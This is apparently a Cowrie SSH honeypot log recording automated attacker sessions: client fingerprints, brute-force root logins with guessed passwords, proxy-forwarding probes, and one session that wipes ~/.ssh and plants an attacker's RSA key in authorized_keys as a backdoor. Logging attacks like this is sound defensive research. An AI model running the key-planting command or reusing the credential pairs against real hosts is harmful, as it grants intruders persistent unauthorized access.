{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:47:58.078236Z","src_ip":"212.227.235.229","session":"c417d01bc113"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35888,"dst_ip":"1.2.3.4","dst_port":22,"session":"be963cb4300b","protocol":"ssh","message":"New connection: 212.227.235.229:35888 (1.2.3.4:22) [session: be963cb4300b]","sensor":"my-vps","timestamp":"2025-08-26T12:48:05.387135Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:48:05.388063Z","src_ip":"212.227.235.229","session":"be963cb4300b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36177,"dst_ip":"1.2.3.4","dst_port":22,"session":"d10489e14309","protocol":"ssh","message":"New connection: 212.227.235.229:36177 (1.2.3.4:22) [session: d10489e14309]","sensor":"my-vps","timestamp":"2025-08-26T12:48:05.573649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:48:05.574575Z","src_ip":"212.227.235.229","session":"d10489e14309"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T12:48:05.733505Z","src_ip":"212.227.235.229","session":"d10489e14309"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:48:06.215409Z","src_ip":"212.227.235.229","session":"d10489e14309"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T12:48:06.375452Z","session":"d10489e14309"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18884,"dst_ip":"1.2.3.4","dst_port":22,"session":"eee310f5b960","protocol":"ssh","message":"New connection: 213.209.150.239:18884 (1.2.3.4:22) [session: eee310f5b960]","sensor":"my-vps","timestamp":"2025-08-26T12:48:11.562438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:48:11.563138Z","src_ip":"213.209.150.239","session":"eee310f5b960"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T12:48:11.610236Z","src_ip":"213.209.150.239","session":"eee310f5b960"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:48:11.844425Z","src_ip":"213.209.150.239","session":"eee310f5b960"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":6782,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:6782","sensor":"my-vps","timestamp":"2025-08-26T12:48:11.892198Z","session":"eee310f5b960"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T12:48:11.939289Z","src_ip":"213.209.150.239","session":"eee310f5b960"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":6010,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6010","sensor":"my-vps","timestamp":"2025-08-26T12:48:12.073535Z","session":"eee310f5b960"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T12:48:12.120748Z","src_ip":"213.209.150.239","session":"eee310f5b960"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:48:12.168382Z","src_ip":"213.209.150.239","session":"eee310f5b960"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40448,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cc773608925","protocol":"ssh","message":"New connection: 212.227.235.229:40448 (1.2.3.4:22) [session: 4cc773608925]","sensor":"my-vps","timestamp":"2025-08-26T12:48:21.821567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:48:22.565919Z","src_ip":"212.227.235.229","session":"4cc773608925"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:48:22.566636Z","src_ip":"212.227.235.229","session":"4cc773608925"}
{"eventid":"cowrie.login.success","username":"root","password":"Mithilesh@123","message":"login attempt [root/Mithilesh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:48:25.721047Z","src_ip":"212.227.235.229","session":"4cc773608925"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:48:26.454955Z","src_ip":"212.227.235.229","session":"4cc773608925"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45097,"dst_ip":"1.2.3.4","dst_port":22,"session":"704a7fdf7f69","protocol":"ssh","message":"New connection: 212.227.235.229:45097 (1.2.3.4:22) [session: 704a7fdf7f69]","sensor":"my-vps","timestamp":"2025-08-26T12:48:54.914174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:48:54.915274Z","src_ip":"212.227.235.229","session":"704a7fdf7f69"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:48:55.104534Z","src_ip":"212.227.235.229","session":"704a7fdf7f69"}
{"eventid":"cowrie.login.failed","username":"patrick","password":"patrick","message":"login attempt [patrick/patrick] failed","sensor":"my-vps","timestamp":"2025-08-26T12:48:55.897623Z","src_ip":"212.227.235.229","session":"704a7fdf7f69"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:48:57.087272Z","src_ip":"212.227.235.229","session":"704a7fdf7f69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54126,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1c85bd91be6","protocol":"ssh","message":"New connection: 212.227.235.229:54126 (1.2.3.4:22) [session: e1c85bd91be6]","sensor":"my-vps","timestamp":"2025-08-26T12:49:00.994490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:49:00.995520Z","src_ip":"212.227.235.229","session":"e1c85bd91be6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:49:01.246464Z","src_ip":"212.227.235.229","session":"e1c85bd91be6"}
{"eventid":"cowrie.login.success","username":"root","password":"asd123!@#","message":"login attempt [root/asd123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:49:04.827136Z","src_ip":"212.227.235.229","session":"e1c85bd91be6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:49:05.349033Z","src_ip":"212.227.235.229","session":"e1c85bd91be6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:49:05.350239Z","src_ip":"212.227.235.229","session":"e1c85bd91be6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:49:05.351127Z","src_ip":"212.227.235.229","session":"e1c85bd91be6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:49:05.603334Z","src_ip":"212.227.235.229","session":"e1c85bd91be6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:49:06.239125Z","src_ip":"212.227.235.229","session":"e1c85bd91be6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:49:06.240055Z","src_ip":"212.227.235.229","session":"e1c85bd91be6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:49:06.495682Z","src_ip":"212.227.235.229","session":"e1c85bd91be6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:49:06.496678Z","src_ip":"212.227.235.229","session":"e1c85bd91be6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55310,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8e3a3b3ff7f","protocol":"ssh","message":"New connection: 212.227.235.229:55310 (1.2.3.4:22) [session: f8e3a3b3ff7f]","sensor":"my-vps","timestamp":"2025-08-26T12:49:06.746126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:49:06.747048Z","src_ip":"212.227.235.229","session":"f8e3a3b3ff7f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:49:07.001930Z","src_ip":"212.227.235.229","session":"f8e3a3b3ff7f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:49:08.062150Z","src_ip":"212.227.235.229","session":"f8e3a3b3ff7f"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:49:09.319260Z","src_ip":"212.227.235.229","session":"f8e3a3b3ff7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55320,"dst_ip":"1.2.3.4","dst_port":22,"session":"89a9b060c4b0","protocol":"ssh","message":"New connection: 212.227.235.229:55320 (1.2.3.4:22) [session: 89a9b060c4b0]","sensor":"my-vps","timestamp":"2025-08-26T12:49:09.569005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:49:09.569723Z","src_ip":"212.227.235.229","session":"89a9b060c4b0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54128,"dst_ip":"1.2.3.4","dst_port":22,"session":"38f44f5548c1","protocol":"ssh","message":"New connection: 217.72.205.35:54128 (1.2.3.4:22) [session: 38f44f5548c1]","sensor":"my-vps","timestamp":"2025-08-26T12:49:09.673234Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:49:09.674880Z","src_ip":"217.72.205.35","session":"38f44f5548c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:49:10.771546Z","src_ip":"212.227.235.229","session":"89a9b060c4b0"}
